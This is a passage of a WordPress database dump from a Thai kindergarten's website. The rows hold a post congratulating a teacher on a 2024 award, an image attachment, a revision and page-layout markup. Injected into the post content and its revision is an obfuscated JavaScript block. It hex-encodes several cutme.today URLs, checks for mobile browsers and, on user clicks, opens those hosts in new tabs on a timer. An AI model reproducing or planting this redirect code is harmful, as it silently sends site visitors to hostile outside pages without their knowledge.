_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ นางจิตร์วริน อยู่เย็น (ครูอ๊อพ) ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการพิเศษ ในโอกาสได้รับเครื่องหมายเชิดชูเกียรติ “คุรุสดุดี” ประจำปี 2567 จังหวัดศรีสะเกษ ประเภท ครู','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-6','','','2024-07-29 18:57:59','2024-07-29 11:57:59','',0,'http://watprato.ssk.in.th/?p=136',0,'post','',0),
(137,1,'2024-07-29 18:57:48','2024-07-29 11:57:48','','442507862_122150309288202781_2842318848400673504_n','','inherit','open','closed','','442507862_122150309288202781_2842318848400673504_n','','','2024-07-29 18:57:48','2024-07-29 11:57:48','',136,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/442507862_122150309288202781_2842318848400673504_n.jpg',0,'attachment','image/jpeg',0),
(138,1,'2024-07-29 18:57:58','2024-07-29 11:57:58','<!-- wp:generateblocks/image {\"uniqueId\":\"d013bfab\",\"mediaId\":137,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-d013bfab\"><img class=\"gb-image gb-image-d013bfab\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/442507862_122150309288202781_2842318848400673504_n.jpg\" alt=\"\" title=\"442507862_122150309288202781_2842318848400673504_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับ นางจิตร์วริน อยู่เย็น (ครูอ๊อพ) ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการพิเศษ ในโอกาสได้รับเครื่องหมายเชิดชูเกียรติ “คุรุสดุดี” ประจำปี 2567 จังหวัดศรีสะเกษ ประเภท ครู','','inherit','closed','closed','','136-revision-v1','','','2024-07-29 18:57:58','2024-07-29 11:57:58','',136,'http://watprato.ssk.in.th/?p=138',0,'revision','',0),
(139,1,'2024-07-29 18:58:42','2024-07-29 11:58:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 